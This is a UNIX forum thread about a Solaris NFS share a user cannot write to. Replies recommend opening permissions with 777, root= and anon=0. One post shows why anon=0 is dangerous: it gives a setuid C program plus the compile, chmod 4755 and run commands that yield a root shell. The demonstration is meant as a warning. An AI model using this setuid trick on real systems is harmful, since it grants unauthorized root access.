Unable to write to a mounted NFS share


 
Thread Tools Search this Thread
Top Forums UNIX for Dummies Questions & Answers Unable to write to a mounted NFS share
# 1  
Old 09-12-2014
Unable to write to a mounted NFS share

Hi All,

I created a nfs share in the server(Solaris 10) with the following command and also updated the dfstab file

share -F nfs -o rw=server_name2,anon=0 /to_share

And then in the client(solaris 10) added the following command to mount the share

mount -F nfs server_name1:/to_share /shared_by


In the client ,I changed the owner of the mount directory and all the files in it to another user (oracle)
But it doesn't allow oracle to modify the file or create a new file in the dir.

Please let me know if I need to change any option.

Thanks
# 2  
Old 09-13-2014
What you've done seems to me like it should work. Nothing jumps out at me as being incorrect. It could be a permissions issue; perhaps not.

What I would do is to get it working first by opening up security if it's not too big a risk for the site, and then close things down step by step checking it still works.

Here's what I would do in your position...........

1. Are you sure that the shared directory on the server allows writing permission to that client? To be sure set the actual shared directory rights to 777. Does it work now?

2. When the server receives an in-bound connection request it only has the clients ip address. Can the server resolve that to the client name that you have given in your share command? Ensure that client (and its ip address) appears in /etc/hosts or can be resolved through DNS. If not, the server doesn't know who's who.

(On the server, if you

Code:
# ping <client name>

Do you get the correct response? Is the client name resolved to the correct ip address?)

Does it work now?

3. Try changing your share command to:

Code:
share -F nfs -o rw,root=server_name2 /to_share

to give the in-bound connection root permissions on the server. (You can also omit the anon=0, it's a "catch all" for unidentified users.)

Does it work now?

Remember that you may need to re-issue the server share, and re-issue the client NFS mount to test it.

Hope that helps.

Do please post back your progress. There's other things to try. There's loads of expertise on this forum to help you, be assured of that.

If you can take the security risk, get it working first at any cost and then tighten up afterwards. If you can't take that risk, let us know.

Last edited by hicksd8; 09-15-2014 at 04:37 PM..
This User Gave Thanks to hicksd8 For This Post:
# 3  
Old 09-15-2014
Hi ,

Thank you mfor your most detailed answer and it solved my problem when I used
root=server_name2
But somehow I had to use

anon=0 too without which it didn't allow the user to create any file in the dir.

Thanks again.
# 4  
Old 09-15-2014
Using "anon=0" is about as dangerous to security as you can possibly imagine.

What "anon=0" means is, "If I don't know who you are, I'm giving you root permissions in the file system." If you need to do THAT, something is badly broken in your configuration. BADLY BROKEN.

Create this file in that NFS file system on an NFS client as a user that's not recognized by the NFS server:
crack.c:
Code:
#include <unistd.h>
int main( int argc, char **argv )
{
    setuid( 0 );
    seteuid( 0 );
    setgid( 0 );
    setegid( 0 );
    execv( argv[ 1 ], argv + 1 );
}

Now run these commands:
Code:
cc crack.c -o crack
chmod 4755 crack

Then run something like this from any host mounting that file system - as any user - whether it's mounted natively or via NFS:
Code:
crack /bin/bash

Instant root shell, goodbye security.
# 5  
Old 09-15-2014
Having to use
Code:
anon=0

is telling you that
Code:
rw,root=<client name>

is not sufficient to identify the client. See note 2 in my post#2.

Did you put (previously created) files in the share directory on the server? If so, what security mask is on them? You may have set the parent share directory to 777, but what about the files below?

Yes, as I recommended you got it working "at any cost" but you now need to consider the security level you are going to run with.

As already pointed out by Achenle, using anon=0 gives root access to all unidentified users. It all depends whether you can risk that.
 
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. AIX

Unable to mount previously-working NFS share from NIM to LPAR

Right, now that I've finally worked out this website, I'll ask my question! I am having an absolute nightmare with NFS on AIX. I have used it many times, and I know what I'm doing, however I cannot fathom what is going on here. I have 2 LPARs, sitting on the same physical host. They are... (12 Replies)
Discussion started by: tmooredba
12 Replies

2. IP Networking

Unable to search NFS Share

My customer has created a share on a Windows Server 2012 system and exported it as a NFS share. I can mount the share on a SCO system, but I only have read/write access. So I am unable to list the contents of the share. It is as if the directories had 0666 permissions. My customer says that this... (5 Replies)
Discussion started by: jgt
5 Replies

3. HP-UX

Unable to write to NFS mounted directory

Hi, I have exported a few nfs mounts from one server to the nfs clients. This is my nfs server dfstab : # cat /etc/dfs/dfstab # place share(1M) commands here for automatic execution # on entering init state 3. # # share <pathname> # .e.g, # share -F... (3 Replies)
Discussion started by: anaigini45
3 Replies

4. Shell Programming and Scripting

Mount NFS Share On NFS Client via bash script.

I need a help of good people with effective bash script to mount nfs shared, By the way I did the searches, since i haven't found that someone wrote a script like this in the past, I'm sure it will serve more people. The scenario as follow: An NFS Client with Daily CRON , running bash script... (4 Replies)
Discussion started by: Brian.t
4 Replies

5. Red Hat

Unable to access NFS share on Solaris Server from Linux client

Hi, I am trying to access a NFS shared directory on Solaris 10 Server from a client which is RHEL 4 Server. On the NFS Server, in /etc/dfs/, I added following line to dfstab file. share -F nfs -o rw /var/share & then ran the following svcadm -v enable -r... (3 Replies)
Discussion started by: SunilB2011
3 Replies

6. UNIX for Dummies Questions & Answers

NFS mounted drive showing Write protected message

Hi We have two servers name A and B . I have a folder "Share" on A was NFS mounted to "B" server. I have set the ACL permissions using setfacl , so that both (One user from Server A and another user from Server B) users can read and write to the directory. Both users can create the... (0 Replies)
Discussion started by: rakeshkumar
0 Replies

7. AIX

I/O speed to CIFS mounted Windows Share

I have an AIX box that mounts a Windows share across subnets. When I try to copy a 100 MB file to it, it copies around 2 MB/s. If I copy to another Windows share on the same subnet it copies around 12 MB/s. All I have is gigabit networks so I would expect it to go well over 12 MB/s, which is the... (8 Replies)
Discussion started by: kah00na
8 Replies

8. Solaris

how to make nas share mounted in zones persistent across reboots?

there are few nas shares that would be mounted on the local zone. should i add an entry into the add an entry in zone.xml file so that it gets mounted automatically when the zone gets rebooted? or whats the correct way to get it mounted automatically when the zone reboots (2 Replies)
Discussion started by: chidori
2 Replies

9. Shell Programming and Scripting

Apache/CGI Bin Accessing mounted SMB share

Hey Guys, I need to copy some files from my Apache server to SMB share ... copy $file,"/Volumes/v1/x/test/$datestamp$name$suffix" Unfortunately this command when executed from Apache/cgi-bin is not able to access mounted volumes .. is there anything that can be done about that ... Can... (1 Reply)
Discussion started by: NDxiak
1 Replies

10. AIX

Unable to mount NFS share during boot

Hello Everyone, I have a pseries machine running AIX 4.3.3 that has an invalid IP in /etc/hosts. During a boot the system hangs because it's trying to mount an NFS share to this invalid IP. I've tried to boot the system from a mksysb (not sure if the device was defined as rmt0) and AIX CD... (0 Replies)
Discussion started by: jlslhills
0 Replies
Login or Register to Ask a Question